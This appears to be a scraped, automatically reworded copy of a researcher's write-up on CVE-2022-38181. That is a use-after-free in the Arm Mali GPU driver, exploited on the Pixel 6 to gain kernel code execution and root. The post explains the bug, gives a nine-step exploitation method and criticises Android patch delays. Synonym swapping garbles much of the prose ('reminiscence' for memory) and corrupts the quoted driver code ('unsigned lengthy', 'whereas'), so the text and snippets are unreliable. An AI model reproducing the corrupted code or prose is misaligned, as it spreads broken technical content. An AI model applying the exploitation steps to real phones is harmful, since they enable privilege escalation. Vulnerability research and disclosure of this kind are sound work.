Now Reading
Pwning the all Google cellphone with a non-Google bug

Pwning the all Google cellphone with a non-Google bug

2023-01-23 10:03:17

The “not-Google” bug within the “all-Google” cellphone

The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched.

Well not entirely…

One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.

An unlucky safety researcher was about to study this the exhausting means as he wandered into the Arm Mali regime:

Screenshot of an email from the Android security team that the reported bug has been labeled "won't fix."

CVE-2022-38181

In this post I’ll cover the details of CVE-2022-38181, a vulnerability within the Arm Mali GPU that I reported to the Android safety staff on 2022-07-12 together with a proof-of-concept exploit that used this vulnerability to realize arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially ranking it as a Excessive-severity vulnerability, the Android safety staff later determined to reclassify it as a “Gained’t repair” they usually handed my report back to Arm’s safety staff. I used to be finally in a position to get in contact with Arm’s safety staff to independently comply with up on the problem. The Arm safety staff had been very useful all through and launched a public patch in model r40p0 of the driver on 2022-10-07 to handle the problem, which was significantly faster than related disclosures that I had prior to now on Android. A coordinated disclosure date of round mid-November was additionally agreed to permit time for customers to use the patch. Nonetheless, I used to be unable to attach with the Android safety staff and the bug was quietly mounted within the January replace on the Pixel gadgets as bug 259695958. Neither the CVE ID, nor the bug ID (the unique 238770628 and the brand new 259695958) had been talked about within the safety bulletin. Our advisory, together with the disclosure timeline, could be discovered here.

The Arm Mali GPU

The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some particular gadgets that use the Mali GPU.

As defined in my other post, GPU drivers on Android are a really enticing goal for an attacker, as they are often reached immediately from the untrusted app area and most Android gadgets use both Qualcomm’s Adreno GPU, or the Arm Mali GPU, which means that comparatively few bugs can cowl a lot of gadgets.

In truth, of the seven Android 0-days that had been detected as exploited within the wild in 2021– 5 focused GPU drivers. One other more moderen bug that was exploited within the wild – CVE-2021-39793, disclosed in March 2022 – additionally focused a GPU driver. Collectively, of those six bugs that had been exploited within the wild that focused Android GPU drivers, three bugs focused the Qualcomm GPU, whereas the opposite three focused the Arm Mali GPU.

Because of the complexity concerned in managing reminiscence sharing between person area purposes and the GPU, most of the vulnerabilities within the Arm Mali GPU contain the reminiscence administration code. The present vulnerability is one other instance of this, and entails a particular kind of GPU reminiscence: the JIT reminiscence.

Opposite to the title, JIT reminiscence doesn’t appear to be associated to JIT compiled code, as it’s created as non-executable reminiscence. As a substitute, it appears to be used for reminiscence caches, managed by the GPU kernel driver, that may readily be shared with person purposes and returned to the kernel when reminiscence stress arises.

Many different varieties of GPU reminiscence are created immediately utilizing ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for instance, the part “Memory management in the Mali kernel driver” in my earlier submit.) This, nonetheless, will not be the case for JIT reminiscence areas, that are created by submitting a particular GPU instruction utilizing the KBASE_IOCTL_JOB_SUBMIT ioctl name.

The KBASE_IOCTL_JOB_SUBMIT ioctl can be utilized to submit a “job chain” to the GPU for processing. Every job chain is principally a listing of jobs, that are opaque knowledge buildings that include job headers, adopted by payloads that include the precise directions. For an instance, see the Writing to GPU memory part in my earlier submit. Whereas the KBASE_IOCTL_JOB_SUBMIT is often used for sending directions to the GPU itself, there are additionally some jobs which might be carried out within the kernel and run on the host (CPU) as a substitute. These are the software program jobs (“softjobs”) and amongst them are jobs that instruct the kernel to allocate and free JIT reminiscence (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE).

The life cycle of JIT reminiscence

While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts.

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This entails the person app opening the motive force file and utilizing the ensuing file descriptor to make a collection of ioctl calls. A kbase_context object is accountable for managing sources for every driver file that’s opened and is exclusive for every file deal with. Particularly, it has three list_head fields which might be accountable for managing JIT reminiscence: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names counsel, jit_active_head accommodates reminiscence that’s nonetheless in use by the person software, jit_pool_head accommodates reminiscence areas that aren’t in use, and jit_destroy_head accommodates reminiscence areas which might be pending to be freed and returned to the kernel. Though each jit_pool_head and jit_destroy_head are used to handle JIT areas which might be free, jit_pool_head acts like a reminiscence pool and accommodates JIT areas which might be supposed to be reused when new JIT areas are allotted, whereas jit_destroy_head accommodates areas which might be going to be returned to the kernel.

When kbase_jit_allocate is named, it’ll first attempt to discover a appropriate area within the jit_pool_head:

    if (info->usage_id != 0)
        /* First scan for an allocation with the identical utilization ID */
        reg = find_reasonable_region(data, &kctx->jit_pool_head, false);
        ...
    if (reg) {
        ...
        list_move(&reg->jit_node, &kctx->jit_active_head);

If an acceptable area is discovered, then it’ll be moved to jit_active_head, indicating that it’s now in use in userland. In any other case, a reminiscence area will likely be created and added to the jit_active_head as a substitute. The area allotted by kbase_jit_allocate, whether or not it’s newly created or reused from jit_pool_head, is then saved within the jit_alloc array of the kbase_context by kbase_jit_allocate_process.

When the person now not wants the JIT reminiscence, it might ship a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then makes use of kbase_jit_free to free the reminiscence. Nonetheless, relatively than returning the backing pages of the reminiscence area again to the kernel instantly, kbase_jit_free first reduces the backing area to a minimal measurement and removes any CPU facet mapping, so the pages within the area are now not reachable from the handle area of the person course of:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    //First cut back the dimensions of the backing area and unmap the freed pages
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        u64 new_size = MAX(reg->initial_commit,
            div_u64(old_pages * (100 - kctx->trim_level), 100));
        u64 delta = old_pages - new_size;
        //Free delta pages within the area and reduces its measurement to old_pages - delta
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);
            mutex_unlock(&kctx->reg_lock);
        }
    }
    ...
    //Take away the pages from handle area of person course of
    kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);    

Observe that the backing pages of the area (reg) usually are not utterly eliminated at this stage, and reg can be not going to be freed right here. As a substitute, reg is moved again into jit_pool_head. Nonetheless, maybe extra apparently, reg can be moved to the evict_list of the kbase_context:

    kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
    ...
    mutex_lock(&kctx->jit_evict_lock);
    /* This allocation cannot already be on a listing. */
    WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
    //Add reg to evict_list
    list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
    atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
    //Transfer reg to jit_pool_head
    list_move(&reg->jit_node, &kctx->jit_pool_head);

After kbase_jit_free accomplished, its caller, kbase_jit_free_finish, may also clear up the reference saved in jit_alloc when the area was allotted, despite the fact that reg continues to be legitimate at this stage:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
            }
            kctx->jit_alloc[ids[j]] = NULL;    //<--------- clear up reference
        }
    }
    ...
}

As we’ve seen earlier than, the reminiscence area within the jit_pool_head checklist might now be reused when the person allocates one other JIT area. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT reminiscence is freed by calling kbase_jit_free, additionally it is placed on the evict_list. Reminiscence areas within the evict_list are areas that may be freed when reminiscence stress arises. By placing a JIT area that’s now not in use within the evict_list, the Mali driver can maintain onto unused JIT reminiscence for fast reallocation, whereas returning them to the kernel when the sources are wanted.

The Linux kernel supplies a mechanism to reclaim unused cached reminiscence, referred to as shrinkers. Kernel parts, similar to drivers, can outline a shrinker object, which, amongst different issues, entails defining the count_objects and scan_objects strategies:

struct shrinker {
    unsigned lengthy (*count_objects)(struct shrinker *,
                       struct shrink_control *sc);
    unsigned lengthy (*scan_objects)(struct shrinker *,
                      struct shrink_control *sc);
    ...
};

The customized shrinker can then be registered by way of the register_shrinker technique. When the kernel is below reminiscence stress, it’ll undergo the checklist of registered shrinkers and use their count_objects technique to find out potential quantity of reminiscence that may be freed, after which use scan_objects to free the reminiscence. Within the case of the Mali GPU driver, the shrinker is outlined and registered within the kbase_mem_evictable_init technique:

int kbase_mem_evictable_init(struct kbase_context *kctx)
{
    ...
    //kctx->reclaim is a shrinker
    kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
    kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
    ...
    register_shrinker(&kctx->reclaim);
    return 0;
}

The extra attention-grabbing a part of these strategies is the kbase_mem_evictable_reclaim_scan_objects, which is accountable for releasing the reminiscence wanted by the kernel.

static
unsigned lengthy kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
        struct shrink_control *sc)
{
    ...
    list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
        int err;

        err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg,
                0, alloc->nents);
        ...
        kbase_free_phy_pages_helper(alloc, alloc->evicted);
        ...
        list_del_init(&alloc->evict_node);
        ...
        kbase_jit_backing_lost(alloc->reg);   //<------- strikes `reg` to `jit_destroy_pool`
    }
    ...
}

That is referred to as to take away cached reminiscence in jit_pool_head and return it to the kernel. The operate kbase_mem_evictable_reclaim_scan_objects goes by the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already eliminated in kbase_jit_free) after which frees the backing pages. It then calls kbase_jit_backing_lost to maneuver reg from jit_pool_head to jit_destroy_head:

void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
    ...
    list_move(&reg->jit_node, &kctx->jit_destroy_head);

    schedule_work(&kctx->jit_work);
}

The reminiscence area in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region totally.

Effectively not totally…one small pointer nonetheless holds out in opposition to the clear up logic. And lifelong administration will not be simple for the pointers within the fortified camps of the Arm Mali regime.

The clear up logic in kbase_mem_evictable_reclaim_scan_objects will not be accountable for eradicating the reference in jit_alloc from when the JIT reminiscence is allotted, however this isn’t an issue, as a result of as we’ve seen earlier than, this reference was cleared when kbase_jit_free_finish was referred to as to place the area within the evict_list and, usually, a JIT area is barely moved to the evict_list when the person frees it by way of a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference saved in jit_alloc.

However we don’t do regular issues right here, nor do the individuals who search to compromise gadgets.

The vulnerability

While the semantics of memory eviction is closely tied to JIT memory with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_objects), evictable memory is more general and other types of GPU memory can also be added to the evict_list and be made evictable. This can be achieved by calling kbase_mem_evictable_make so as to add reminiscence areas to the evict_list and kbase_mem_evictable_unmake to take away reminiscence areas from it. From userspace, these could be referred to as by way of the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Relying on whether or not the KBASE_REG_DONT_NEED flag is handed, a reminiscence area could be added or faraway from the evict_list:

int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int masks)
{
    ...
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
    if (prev_needed != new_needed) {
        ...
        if (new_needed) {
            ...
            ret = kbase_mem_evictable_make(reg->gpu_alloc);  //<------ Add to `evict_list`
            if (ret)
                goto out_unlock;
        } else {
            kbase_mem_evictable_unmake(reg->gpu_alloc);     //<------- Take away from `evict_list`
        }
    }

By placing a JIT reminiscence area immediately within the evict_list after which creating reminiscence stress to set off kbase_mem_evictable_reclaim_scan_objects, the JIT area will likely be freed with a pointer to it nonetheless saved in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job could be submitted to set off kbase_jit_free_finish to make use of the freed object pointed to in jit_alloc:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);  //<----- Use of the now freed jit_alloc[ids[j]]
            }
            kctx->jit_alloc[ids[j]] = NULL;
        }
    }

Amongst different issues, kbase_jit_free will first free among the backing pages within the now freed kctx->jit_alloc[ids[j]]:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages within the area
            mutex_unlock(&kctx->reg_lock);
        }
    }

So by changing the freed JIT area with a pretend object, I can doubtlessly free arbitrary pages, which is a really highly effective primitive.

Exploiting the bug

As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably.

It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered.

The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY for querying properties of reminiscence areas at a particular GPU handle. If the handle is invalid, the ioctl will fail and return an error. This enables me to examine whether or not the JIT area is freed, as a result of when kbase_mem_evictable_reclaim_scan_objects is named to free the JIT area, it’ll first take away its GPU mappings, making its GPU handle invalid. By utilizing the KBASE_IOCTL_MEM_QUERY ioctl to question the GPU handle of the JIT area after every allocation, I can subsequently examine whether or not the area has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and solely begin spraying the heap to switch the JIT area when it’s really freed. Furthermore, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t contain reminiscence allocation, so it gained’t intervene with the thing alternative. This makes it good for testing whether or not the bug has been triggered.

Though shrinker is a kernel mechanism for releasing up evictable reminiscence, the scanning and removing of evictable objects by way of shrinkers is definitely carried out by the method that’s requesting the reminiscence. So for instance, if my course of is mapping some reminiscence to its handle area (by way of mmap after which faulting the pages), and the quantity of reminiscence that I’m mapping creates adequate reminiscence stress {that a} shrinker scan is triggered, then the shrinker scan and the removing of the evictable objects will likely be finished within the context of my course of. This, specifically, implies that if I pin my course of to a CPU whereas the shrinker scan is triggered, the JIT area that’s eliminated through the scan will likely be freed on the identical CPU. (Strictly talking, this isn’t one hundred percent appropriate, as a result of the JIT area is definitely scheduled to be freed on a worker, however more often than not, the employee is certainly executed instantly on the identical CPU.) This helps me to switch the freed JIT area reliably, as a result of when objects are freed within the kernel, they’re positioned inside a per CPU cache, and subsequent object allocations on the identical CPU will first be allotted from the CPU cache. Which means, by allocating one other object of comparable measurement on the identical CPU, I’m doubtless to have the ability to exchange the freed JIT area. Furthermore, the JIT area, which is a kbase_va_region, is definitely a relatively giant object that’s allotted within the kmalloc-256 cache, (which is used to allocate objects of measurement between 256-512 bytes when kmalloc is named) as a substitute of the kmalloc-128 cache, (which allocates objects of measurement lower than 128 bytes), and the kmalloc-256 cache is a much less used cache. This, along with the relative certainty of the CPU that frees the JIT area, permits me to reliably exchange the JIT area after it’s freed.

Changing the freed object

Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages in the region
            mutex_unlock(&kctx->reg_lock);
        }
    }

One possibility is to use the well-known heap spraying technique to switch the freed JIT area with arbitrary knowledge utilizing sendmsg. This may allow me to create a pretend kbase_va_region with a pretend gpu_alloc and faux pages that could possibly be used to free arbitrary pages in kbase_mem_shrink:

int kbase_mem_shrink(struct kbase_context *const kctx,
        struct kbase_va_region *const reg, u64 new_pages)
{
    ...
    err = kbase_mem_shrink_gpu_mapping(kctx, reg,
            new_pages, old_pages);
    if (err >= 0) {
        /* Replace all CPU mapping(s) */
        kbase_mem_shrink_cpu_mapping(kctx, reg,
                new_pages, old_pages);
        kbase_free_phy_pages_helper(reg->cpu_alloc, delta);   //<------- free pages in cpu_alloc
        if (reg->cpu_alloc != reg->gpu_alloc)
            kbase_free_phy_pages_helper(reg->gpu_alloc, delta);   //<--- free pages in gpu_alloc

So as to take action, I’d have to know the addresses of some knowledge that I can management, so I may create a pretend gpu_alloc and its pages discipline at these addresses. This could possibly be finished both by discovering a option to leak addresses of kernel objects, or use methods just like the one I wrote about within the Part “The Ultimate fake object store” in my different submit.

However why use a pretend object when you need to use an actual one?

The JIT area that’s concerned within the use-after-free bug here’s a kbase_va_region, which is a fancy object that has a number of states. Many operations can solely be carried out on reminiscence objects with an accurate state. Particularly, kbase_mem_shrink can solely be used on a kbase_va_region that has not been mapped a number of occasions.

The Mali driver supplies the KBASE_IOCTL_MEM_ALIAS ioctl that enables a number of reminiscence areas to share the identical backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in additional particulars in my previous post, however for the aim of this exploit, the essential level is that KBASE_IOCTL_MEM_ALIAS can be utilized to create reminiscence areas within the GPU and person handle areas which might be aliased to a kbase_va_region, which means that they’re backed by the identical bodily pages. If a kbase_va_region reg is mapped a number of occasions through the use of KBASE_IOCTL_MEM_ALIAS after which has its backing pages freed by kbase_mem_shrink, then solely the reminiscence mappings in reg are eliminated, so the alias areas created by KBASE_IOCTL_MEM_ALIAS can nonetheless be used to entry the freed backing pages.

To forestall kbase_mem_shrink from being referred to as on aliased JIT reminiscence, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE, in order that JIT reminiscence can’t be aliased:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
            u64 nents, struct base_mem_aliasing_info *ai,
            u64 *num_pages)
{
    ...
    for (i = 0; i < nents; i++) {
        if (ai[i].deal with.basep.deal with < BASE_MEM_FIRST_FREE_ADDRESS) {
            if (ai[i].deal with.basep.deal with !=
                BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
            ...
        } else {
            ...
            if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE)  //<-- 2.
                goto bad_handle; /* JIT areas cannot be
                          * aliased. NO_USER_FREE flag
                          * covers your complete lifetime
                          * of JIT areas. The opposite
                          * varieties of areas lined
                          * by this flag additionally shall
                          * not be aliased.            
            ...
        }

Now suppose I set off the bug and exchange the freed JIT area with a standard reminiscence area allotted by way of the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the very same kind, however with out the KBASE_REG_NO_USER_FREE flag that’s related to a JIT area. I then use KBASE_IOCTL_MEM_ALIAS to create an additional mapping for the backing retailer of this new area. All these are legitimate as I’m simply aliasing a standard reminiscence area that doesn’t have the KBASE_REG_NO_USER_FREE flag. Nonetheless, due to the bug, a dangling pointer in jit_alloc additionally factors to this new area, which has now been aliased.

If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to name kbase_jit_free on this reminiscence, then kbase_mem_shrink will likely be referred to as, and a part of the backing retailer on this new area will likely be freed, however the additional mappings created within the aliased area won’t be eliminated, which means that I can nonetheless entry the freed backing pages from the alias area. By utilizing an actual object of the identical kind, not solely do I save the hassle wanted to craft a pretend object, nevertheless it additionally reduces the danger of getting unwanted effects that might lead to a crash.

See Also

The state of affairs is now similar to what I had in my previous post and the exploit movement from this level on can be very related. For completeness, I’ll give an outline of how the exploit works right here, however readers who’re can check out extra particulars from the Part “Breaking out of the context” onwards in that submit.

To recap, I now have entry to the backing pages in a kbase_va_region object that’s already freed and I’d wish to reuse these freed backing pages so I can achieve learn and write entry to arbitrary reminiscence. To grasp how this may be finished, we have to know the way backing pages to a kbase_va_region are allotted.

When allocating pages for the backing retailer of a kbase_va_region, the kbase_mem_pool_alloc_pages operate is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    whereas (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
    }
    ...
    if (i != nr_4k_pages && pool->next_pool) {
        /* Allocate by way of subsequent pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        whereas (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The enter argument kbase_mem_pool is a reminiscence pool managed by the kbase_context object related to the motive force file that’s used to allocate the GPU reminiscence. Because the feedback counsel, the allocation is definitely finished in tiers. First the pages are allotted from the present kbase_mem_pool utilizing kbase_mem_pool_remove_locked (1 within the above). If there’s not sufficient capability within the present kbase_mem_pool to satisfy the request, then pool->next_pool, is used to allocate the pages (2 within the above). If even pool->next_pool doesn’t have the capability, then kbase_mem_alloc_page is used to allocate pages immediately from the kernel by way of the buddy allocator (the web page allocator within the kernel).

When releasing a web page, the alternative occurs: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the present kbase_context, if the reminiscence pool is full, it’ll attempt to return the remaining pages to pool->next_pool. If the following pool can be full, then the remaining pages are returned to the kernel by releasing them by way of the buddy allocator.

As famous in my previous post, pool->next_pool is a reminiscence pool managed by the Mali driver and shared by all of the kbase_context. It’s also used for allocating page table global directories (PGD) utilized by GPU contexts. Particularly, because of this by fastidiously arranging the reminiscence swimming pools, it’s attainable to trigger a freed backing web page in a kbase_va_region to be reused as a PGD of a GPU context. (The main points of learn how to obtain this may be present in my previous post.) As the underside stage PGD shops the bodily addresses of the backing pages to GPU digital reminiscence addresses, having the ability to write to PGD will enable me to map arbitrary bodily pages to the GPU reminiscence, which I can then learn from and write to by issuing GPU instructions. This provides me entry to arbitrary bodily reminiscence. As bodily addresses for kernel code and static knowledge usually are not randomized and rely solely on the kernel picture, I can use this primitive to overwrite arbitrary kernel code and achieve arbitrary kernel code execution.

Within the following determine, the inexperienced block signifies the identical web page being reused because the PGD.

To summarize, the exploit entails the next steps:

  1. Create JIT reminiscence.
  2. Mark the JIT reminiscence as evictable.
  3. Enhance reminiscence stress by mapping reminiscence to the person area by way of regular mmap system calls.
  4. Use the KBASE_IOCTL_MEM_QUERY ioctl to examine if the JIT reminiscence is freed. Keep on making use of reminiscence stress till the JIT area is freed.
  5. Allocate new GPU reminiscence areas utilizing the KBASE_IOCTL_MEM_ALLOC ioctl to switch the freed JIT reminiscence.
  6. Create an alias area to the brand new GPU reminiscence area that changed the JIT reminiscence in order that the backing pages of the brand new GPU reminiscence are shared with the alias area.
  7. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT area. Because the JIT area is now changed by the brand new reminiscence area, it will trigger kbase_jit_free to take away the backing pages of the brand new reminiscence area, however the GPU mappings created within the alias area in step 6. won’t be eliminated. The alias area can now be used to entry the freed backing pages.
  8. Reuse the freed backing pages as PGD of the kbase_context. The alias area can now be used to rewrite the PGD. I can then map arbitrary bodily pages to the GPU handle area.
  9. Map kernel code to the GPU handle area to realize arbitrary kernel code execution, which may then be used to rewrite the credentials of our course of to realize root, and to disable SELinux.

The exploit for Pixel 6 could be discovered here with some setup notes.

Disclosure and patch gapping

At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident.

There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn’t get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially found by the syzkaller fuzzer in November 2017 and patched in February 2018. Nonetheless, this repair was by no means included in an Android month-to-month safety bulletin till it was rediscovered as an exploited in-the-wild bug in September 2019. One other exploited in-the-wild bug, CVE-2021-1048, was launched within the upstream kernel in December 2020, and was mounted upstream a couple of weeks later. The patch, nonetheless, was not included within the Android Safety Bulletin till November 2021, when it was found to be exploited in-the-wild. One more exploited in-the-wild vulnerability, CVE-2021-0920, was present in 2016 with particulars seen in a Linux kernel e-mail thread. The report, nonetheless, was dismissed by kernel builders on the time, till it was rediscovered to be exploited in-the-wild and patched in November 2021.

To be honest, these circumstances had been patched or ignored upstream with out being recognized as safety points (for instance, CVE-2021-0920 was ignored), making it tough for any vendor to establish such points earlier than it’s too late.

This once more reveals the significance of correctly addressing safety points and recording them by assigning a CVE-ID, in order that downstream customers can apply the related safety patches. Sadly, distributors typically see having safety vulnerabilities of their merchandise as a harm to their status and attempt to silently patch or downplay safety points as a substitute. The above examples present simply how severe the implications of such a mentality could be.

Whereas Android has made enhancements to maintain the kernel branches extra unified and up-to-date to keep away from issues similar to CVE-2019-2215, the place the vulnerability was patched in some branches however not others, some current disclosures spotlight a relatively worrying pattern.

On March seventh, 2022, CVE-2022-0847 (Dirty pipe) was disclosed publicly, with full particulars and a proof-of-concept exploit to overwrite read-only recordsdata. Whereas the bug was patched upstream on February twenty third, 2022, with the patch merged into the Android kernel on February, 24th, 2022, the patch was not included within the Android Safety Bulletin till Could 2022 and the general public proof-of-concept exploit nonetheless ran efficiently on a Pixel 6 with the April patch. Whereas this may occasionally appear like one other incident the place a safety bug was patched silently upstream, this case was very totally different. In line with the disclosure timeline, the bug report was shared with the Android Safety Crew on February twenty first, 2022, a day after it was reported to the Linux kernel.

One other vulnerability, CVE-2021-39793 within the Mali driver, was patched by Arm in model r36p0 of the motive force (as CVE-2022-22706), which was launched on February 11th, 2022. The patch was solely included within the Android Safety Bulletin in March as an exploited in-the-wild bug.

One more vulnerability, CVE-2022-20186 that I reported to the Android Safety Crew on January fifteenth, 2022, was patched by Arm in model r37p0 of the Mali driver, which was launched on April twenty first, 2022. The patch was solely included within the Android Safety Bulletin in June and a Pixel 6 operating the Could patch was nonetheless affected.

Looking at safety points reported by Google’s Undertaking Zero staff, between June and July 2022, Jann Horn of Undertaking Zero reported 5 safety points (2325, 2327, 2331, 2333, 2334) within the Arm Mali GPU that affected the Pixel telephones. These points had been promptly mounted as CVE-2022-33917 and CVE-2022-36449 by the Arm safety staff on July twenty fifth, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The main points of those bugs, together with proof of ideas, had been disclosed on September 18th, 2022. Nonetheless, at the very least among the points remained unfixed in December 2022, (for instance, challenge 2327 was solely mounted silently within the January 2023 patch, with out mentioning the CVE ID) after Undertaking zero revealed a blog post highlighting the patching downside with these explicit points on November twenty second, 2022.

In all of those cases, the bugs had been solely patched in Android a pair months after a patch was publicly launched upstream. In gentle of this, the response to this present bug is maybe not too shocking.

The 12 months is 2023 A.D., and it’s nonetheless simple to pwn Android with N-days totally. Effectively, sure, totally.

Notes

Source Link

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

2022 Blinking Robots.
WordPress by Doejo

Scroll To Top